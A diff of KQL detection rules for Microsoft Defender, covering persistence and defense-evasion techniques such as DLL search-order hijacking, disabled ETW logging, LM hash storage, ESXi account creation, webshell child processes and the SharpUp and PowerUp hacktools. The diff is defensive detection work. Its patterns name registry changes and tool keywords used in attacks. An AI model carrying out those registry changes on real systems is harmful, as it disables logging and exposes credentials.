Date: 2022-08-19 +// Level: medium +// Description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience" \ No newline at end of file diff --git a/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql b/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql index 1cff4d81..262ff091 100644 --- a/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql +++ b/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql @@ -1,11 +1,11 @@ -// Title: DLL Search Order Hijackig Via Additional Space in Path -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-30 -// Level: high -// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) -// but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001 - -DeviceFileEvents +// Title: DLL Search Order Hijackig Via Additional Space in Path +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-30 +// Level: high +// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) +// but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001 + +DeviceFileEvents | where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\") \ No newline at end of file diff --git a/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql b/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql index 3ac845dc..941e415c 100644 --- a/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql +++ b/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql @@ -1,14 +1,14 @@ -// Title: DNS-over-HTTPS Enabled by Registry -// Author: Austin Songer -// Date: 2021-07-22 -// Level: medium -// Description: Detects when a user enables DNS-over-HTTPS. -// This can be used to hide internet activity or be used to hide the process of exfiltrating data. -// With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1140, attack.t1112 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: DNS-over-HTTPS Enabled by Registry +// Author: Austin Songer +// Date: 2021-07-22 +// Level: medium +// Description: Detects when a user enables DNS-over-HTTPS. +// This can be used to hide internet activity or be used to hide the process of exfiltrating data. +// With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1140, attack.t1112 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where (RegistryValueData =~ "secure" and RegistryKey endswith "\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Mozilla\\Firefox\\DNSOverHTTPS\\Enabled") \ No newline at end of file diff --git a/KQL/rules/Persistence/dropping_of_password_filter_dll.kql b/KQL/rules/Persistence/dropping_of_password_filter_dll.kql index 9ab99016..f6cb2abe 100644 --- a/KQL/rules/Persistence/dropping_of_password_filter_dll.kql +++ b/KQL/rules/Persistence/dropping_of_password_filter_dll.kql @@ -1,10 +1,10 @@ -// Title: Dropping Of Password Filter DLL -// Author: Sreeman -// Date: 2020-10-29 -// Level: medium -// Description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.credential-access, attack.t1556.002 - -DeviceProcessEvents +// Title: Dropping Of Password Filter DLL +// Author: Sreeman +// Date: 2020-10-29 +// Level: medium +// Description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.credential-access, attack.t1556.002 + +DeviceProcessEvents | where ProcessCommandLine contains "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "scecli\\0" and ProcessCommandLine contains "reg add" \ No newline at end of file diff --git a/KQL/rules/Persistence/enable_lm_hash_storage.kql b/KQL/rules/Persistence/enable_lm_hash_storage.kql index 4a343b3f..92e70a89 100644 --- a/KQL/rules/Persistence/enable_lm_hash_storage.kql +++ b/KQL/rules/Persistence/enable_lm_hash_storage.kql @@ -1,11 +1,11 @@ -// Title: Enable LM Hash Storage -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-12-15 -// Level: high -// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. -// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: Enable LM Hash Storage +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-12-15 +// Level: high +// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. +// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\NoLMHash" \ No newline at end of file diff --git a/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql b/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql index 7bc80978..bbd19baf 100644 --- a/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql +++ b/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql @@ -1,11 +1,11 @@ -// Title: Enable LM Hash Storage - ProcCreation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-12-15 -// Level: high -// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. -// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceProcessEvents +// Title: Enable LM Hash Storage - ProcCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-12-15 +// Level: high +// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes. +// By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceProcessEvents | where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "NoLMHash" and ProcessCommandLine contains " 0" \ No newline at end of file diff --git a/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql b/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql index cae96f9e..09982deb 100644 --- a/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql +++ b/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql @@ -1,10 +1,10 @@ -// Title: Enabling COR Profiler Environment Variables -// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops) -// Date: 2020-09-10 -// Level: medium -// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.012 - -DeviceRegistryEvents +// Title: Enabling COR Profiler Environment Variables +// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops) +// Date: 2020-09-10 +// Level: medium +// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.012 + +DeviceRegistryEvents | where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH" \ No newline at end of file diff --git a/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql b/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql index 0199040b..b85224c5 100644 --- a/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql +++ b/KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql @@ -1,12 +1,12 @@ -// Title: ESXi Account Creation Via ESXCLI -// Author: Cedric Maurugeon -// Date: 2023-08-22 -// Level: medium -// Description: Detects user account creation on ESXi system via esxcli -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.execution, attack.t1136, attack.t1059.012 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: ESXi Account Creation Via ESXCLI +// Author: Cedric Maurugeon +// Date: 2023-08-22 +// Level: medium +// Description: Detects user account creation on ESXi system via esxcli +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.t1136, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains "system " and ProcessCommandLine contains "account " and ProcessCommandLine contains "add ") and FolderPath endswith "/esxcli" \ No newline at end of file diff --git a/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql b/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql index e858882a..4e3110fb 100644 --- a/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql +++ b/KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql @@ -1,12 +1,12 @@ -// Title: ESXi Admin Permission Assigned To Account Via ESXCLI -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-04 -// Level: high -// Description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1059.012, attack.t1098 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: ESXi Admin Permission Assigned To Account Via ESXCLI +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-04 +// Level: high +// Description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1059.012, attack.t1098 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ProcessCommandLine contains "system" and (ProcessCommandLine contains " permission " and ProcessCommandLine contains " set" and ProcessCommandLine contains "Admin") and FolderPath endswith "/esxcli" \ No newline at end of file diff --git a/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql b/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql index bb458995..0e260f96 100644 --- a/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql +++ b/KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql @@ -1,10 +1,10 @@ -// Title: ETW Logging Disabled For rpcrt4.dll -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-09 -// Level: low -// Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562 - -DeviceRegistryEvents +// Title: ETW Logging Disabled For rpcrt4.dll +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-09 +// Level: low +// Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562 + +DeviceRegistryEvents | where (RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Windows NT\\Rpc\\ExtErrorInformation" \ No newline at end of file diff --git a/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql b/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql index 646cb83c..854243f6 100644 --- a/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql +++ b/KQL/rules/Persistence/etw_logging_disabled_for_scm.kql @@ -1,10 +1,10 @@ -// Title: ETW Logging Disabled For SCM -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-09 -// Level: low -// Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM) -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562 - -DeviceRegistryEvents +// Title: ETW Logging Disabled For SCM +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-09 +// Level: low +// Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows NT\\CurrentVersion\\Tracing\\SCM\\Regular\\TracingDisabled" \ No newline at end of file diff --git a/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql b/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql index 11f646b7..e785f6eb 100644 --- a/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql +++ b/KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql @@ -1,10 +1,10 @@ -// Title: ETW Logging Disabled In .NET Processes - Sysmon Registry -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-06-05 -// Level: high -// Description: Potential adversaries stopping ETW providers recording loaded .NET assemblies. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562 - -DeviceRegistryEvents +// Title: ETW Logging Disabled In .NET Processes - Sysmon Registry +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-06-05 +// Level: high +// Description: Potential adversaries stopping ETW providers recording loaded .NET assemblies. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562 + +DeviceRegistryEvents | where ((RegistryValueData in~ ("0", "DWORD (0x00000000)")) and (RegistryKey endswith "\\COMPlus_ETWEnabled" or RegistryKey endswith "\\COMPlus_ETWFlags")) or (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\ETWEnabled") \ No newline at end of file diff --git a/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql b/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql index 6907e509..4a003dab 100644 --- a/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql +++ b/KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql @@ -1,14 +1,14 @@ -// Title: HackTool - Powerup Write Hijack DLL -// Author: Subhash Popuri (@pbssubhash) -// Date: 2021-08-21 -// Level: high -// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. -// In it's default mode, it builds a self deleting .bat file which executes malicious command. -// The detection rule relies on creation of the malicious bat file (debug.bat by default). -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Any powershell script that creates bat files - -DeviceFileEvents +// Title: HackTool - Powerup Write Hijack DLL +// Author: Subhash Popuri (@pbssubhash) +// Date: 2021-08-21 +// Level: high +// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. +// In it's default mode, it builds a self deleting .bat file which executes malicious command. +// The detection rule relies on creation of the malicious bat file (debug.bat by default). +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Any powershell script that creates bat files + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat" \ No newline at end of file diff --git a/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql b/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql index 95869e63..3f8e0627 100644 --- a/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql +++ b/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - SharpUp PrivEsc Tool Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-08-20 -// Level: critical -// Description: Detects the use of SharpUp, a tool for local privilege escalation -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.discovery, attack.execution, attack.t1615, attack.t1569.002, attack.t1574.005 - -DeviceProcessEvents +// Title: HackTool - SharpUp PrivEsc Tool Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-20 +// Level: critical +// Description: Detects the use of SharpUp, a tool for local privilege escalation +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.discovery, attack.execution, attack.t1615, attack.t1569.002, attack.t1574.005 + +DeviceProcessEvents | where FolderPath endswith "\\SharpUp.exe" or ProcessVersionInfoFileDescription =~ "SharpUp" or (ProcessCommandLine contains "HijackablePaths" or ProcessCommandLine contains "UnquotedServicePath" or ProcessCommandLine contains "ProcessDLLHijack" or ProcessCommandLine contains "ModifiableServiceBinaries" or ProcessCommandLine contains "ModifiableScheduledTask" or ProcessCommandLine contains "DomainGPPPassword" or ProcessCommandLine contains "CachedGPPPassword") \ No newline at end of file diff --git a/KQL/rules/Persistence/ie_change_domain_zone.kql b/KQL/rules/Persistence/ie_change_domain_zone.kql index e86cf1a3..e517c9d5 100644 --- a/KQL/rules/Persistence/ie_change_domain_zone.kql +++ b/KQL/rules/Persistence/ie_change_domain_zone.kql @@ -1,12 +1,12 @@ -// Title: IE Change Domain Zone -// Author: frack113 -// Date: 2022-01-22 -// Level: medium -// Description: Hides the file extension through modification of the registry -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1137 -// False Positives: -// - Administrative scripts - -DeviceRegistryEvents +// Title: IE Change Domain Zone +// Author: frack113 +// Date: 2022-01-22 +// Level: medium +// Description: Hides the file extension through modification of the registry +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137 +// False Positives: +// - Administrative scripts + +DeviceRegistryEvents | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains*" and (not((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "(Empty)")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql b/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql index d0a062eb..87505a48 100644 --- a/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql +++ b/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql @@ -1,12 +1,12 @@ -// Title: IIS Native-Code Module Command Line Installation -// Author: Florian Roth (Nextron Systems) -// Date: 2019-12-11 -// Level: medium -// Description: Detects suspicious IIS native-code module installations via command line -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1505.003 -// False Positives: -// - Unknown as it may vary from organisation to organisation how admins use to install IIS modules - -DeviceProcessEvents +// Title: IIS Native-Code Module Command Line Installation +// Author: Florian Roth (Nextron Systems) +// Date: 2019-12-11 +// Level: medium +// Description: Detects suspicious IIS native-code module installations via command line +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003 +// False Positives: +// - Unknown as it may vary from organisation to organisation how admins use to install IIS modules + +DeviceProcessEvents | where (((ProcessCommandLine contains "install" and ProcessCommandLine contains "module") and (ProcessCommandLine contains "-name:" or ProcessCommandLine contains "/name:" or ProcessCommandLine contains "–name:" or ProcessCommandLine contains "—name:" or ProcessCommandLine contains "―name:")) and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\iissetup.exe")) \ No newline at end of file diff --git a/KQL/rules/Persistence/imports_registry_key_from_a_file.kql b/KQL/rules/Persistence/imports_registry_key_from_a_file.kql index d4244714..a0e79b65 100644 --- a/KQL/rules/Persistence/imports_registry_key_from_a_file.kql +++ b/KQL/rules/Persistence/imports_registry_key_from_a_file.kql @@ -1,13 +1,13 @@ -// Title: Imports Registry Key From a File -// Author: Oddvar Moe, Sander Wiebing, oscd.community -// Date: 2020-10-07 -// Level: medium -// Description: Detects the import of the specified file to the registry with regedit.exe. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1112, attack.defense-evasion -// False Positives: -// - Legitimate import of keys -// - Evernote - -DeviceProcessEvents +// Title: Imports Registry Key From a File +// Author: Oddvar Moe, Sander Wiebing, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: Detects the import of the specified file to the registry with regedit.exe. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1112, attack.defense-evasion +// False Positives: +// - Legitimate import of keys +// - Evernote + +DeviceProcessEvents | where ((ProcessCommandLine contains " /i " or ProcessCommandLine contains " /s " or ProcessCommandLine contains ".reg") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " –e " or ProcessCommandLine contains " —e " or ProcessCommandLine contains " ―e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " –a " or ProcessCommandLine contains " —a " or ProcessCommandLine contains " ―a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") and ProcessCommandLine matches regex ":[^ \\\\]"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql b/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql index dedf9ed8..09572d16 100644 --- a/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql +++ b/KQL/rules/Persistence/imports_registry_key_from_an_ads.kql @@ -1,10 +1,10 @@ -// Title: Imports Registry Key From an ADS -// Author: Oddvar Moe, Sander Wiebing, oscd.community -// Date: 2020-10-12 -// Level: high -// Description: Detects the import of a alternate datastream to the registry with regedit.exe. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1112, attack.defense-evasion - -DeviceProcessEvents +// Title: Imports Registry Key From an ADS +// Author: Oddvar Moe, Sander Wiebing, oscd.community +// Date: 2020-10-12 +// Level: high +// Description: Detects the import of a alternate datastream to the registry with regedit.exe. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1112, attack.defense-evasion + +DeviceProcessEvents | where (((ProcessCommandLine contains " /i " or ProcessCommandLine contains ".reg") and ProcessCommandLine matches regex ":[^ \\\\]") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not((ProcessCommandLine contains " -e " or ProcessCommandLine contains " /e " or ProcessCommandLine contains " –e " or ProcessCommandLine contains " —e " or ProcessCommandLine contains " ―e " or ProcessCommandLine contains " -a " or ProcessCommandLine contains " /a " or ProcessCommandLine contains " –a " or ProcessCommandLine contains " —a " or ProcessCommandLine contains " ―a " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c "))) \ No newline at end of file diff --git a/KQL/rules/Persistence/interactive_at_job.kql b/KQL/rules/Persistence/interactive_at_job.kql index ac88ff8a..0feaf4ea 100644 --- a/KQL/rules/Persistence/interactive_at_job.kql +++ b/KQL/rules/Persistence/interactive_at_job.kql @@ -1,12 +1,12 @@ -// Title: Interactive AT Job -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2019-10-24 -// Level: high -// Description: Detects an interactive AT job, which may be used as a form of privilege escalation. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.002 -// False Positives: -// - Unlikely (at.exe deprecated as of Windows 8) - -DeviceProcessEvents +// Title: Interactive AT Job +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Detects an interactive AT job, which may be used as a form of privilege escalation. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.002 +// False Positives: +// - Unlikely (at.exe deprecated as of Windows 8) + +DeviceProcessEvents | where ProcessCommandLine contains "interactive" and FolderPath endswith "\\at.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/linux_webshell_indicators.kql b/KQL/rules/Persistence/linux_webshell_indicators.kql index 9fe9b890..87162cc1 100644 --- a/KQL/rules/Persistence/linux_webshell_indicators.kql +++ b/KQL/rules/Persistence/linux_webshell_indicators.kql @@ -1,12 +1,12 @@ -// Title: Linux Webshell Indicators -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-10-15 -// Level: high -// Description: Detects suspicious sub processes of web server processes -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.t1505.003 -// False Positives: -// - Web applications that invoke Linux command line tools - -DeviceProcessEvents +// Title: Linux Webshell Indicators +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-10-15 +// Level: high +// Description: Detects suspicious sub processes of web server processes +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1505.003 +// False Positives: +// - Web applications that invoke Linux command line tools + +DeviceProcessEvents | where ((InitiatingProcessFolderPath endswith "/httpd" or InitiatingProcessFolderPath endswith "/lighttpd" or InitiatingProcessFolderPath endswith "/nginx" or InitiatingProcessFolderPath endswith "/apache2" or InitiatingProcessFolderPath endswith "/node" or InitiatingProcessFolderPath endswith "/caddy") or (InitiatingProcessCommandLine contains "/bin/java" and InitiatingProcessCommandLine contains "tomcat") or (InitiatingProcessCommandLine contains "/bin/java" and InitiatingProcessCommandLine contains "websphere")) and (FolderPath endswith "/whoami" or FolderPath endswith "/ifconfig" or FolderPath endswith "/ip" or FolderPath endswith "/bin/uname" or FolderPath endswith "/bin/cat" or FolderPath endswith "/bin/crontab" or FolderPath endswith "/hostname" or FolderPath endswith "/iptables" or FolderPath endswith "/netstat" or FolderPath endswith "/pwd" or FolderPath endswith "/route") \ No newline at end of file diff --git a/KQL/rules/Persistence/macos_emond_launch_daemon.kql b/KQL/rules/Persistence/macos_emond_launch_daemon.kql index 1d6c7e08..7d4cf49c 100644 --- a/KQL/rules/Persistence/macos_emond_launch_daemon.kql +++ b/KQL/rules/Persistence/macos_emond_launch_daemon.kql @@ -1,12 +1,12 @@ -// Title: MacOS Emond Launch Daemon -// Author: Alejandro Ortuno, oscd.community -// Date: 2020-10-23 -// Level: medium -// Description: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.014 -// False Positives: -// - Legitimate administration activities - -DeviceFileEvents +// Title: MacOS Emond Launch Daemon +// Author: Alejandro Ortuno, oscd.community +// Date: 2020-10-23 +// Level: medium +// Description: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.014 +// False Positives: +// - Legitimate administration activities + +DeviceFileEvents | where (FolderPath contains "/etc/emond.d/rules/" and FolderPath endswith ".plist") or FolderPath contains "/private/var/db/emondClients/" \ No newline at end of file diff --git a/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql b/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql index 7ed68386..0ca5d1c7 100644 --- a/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql +++ b/KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql @@ -1,12 +1,12 @@ -// Title: Macro Enabled In A Potentially Suspicious Document -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-21 -// Level: high -// Description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Macro Enabled In A Potentially Suspicious Document +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-21 +// Level: high +// Description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where (RegistryKey contains "/AppData/Local/Microsoft/Windows/INetCache/" or RegistryKey contains "/AppData/Local/Temp/" or RegistryKey contains "/PerfLogs/" or RegistryKey contains 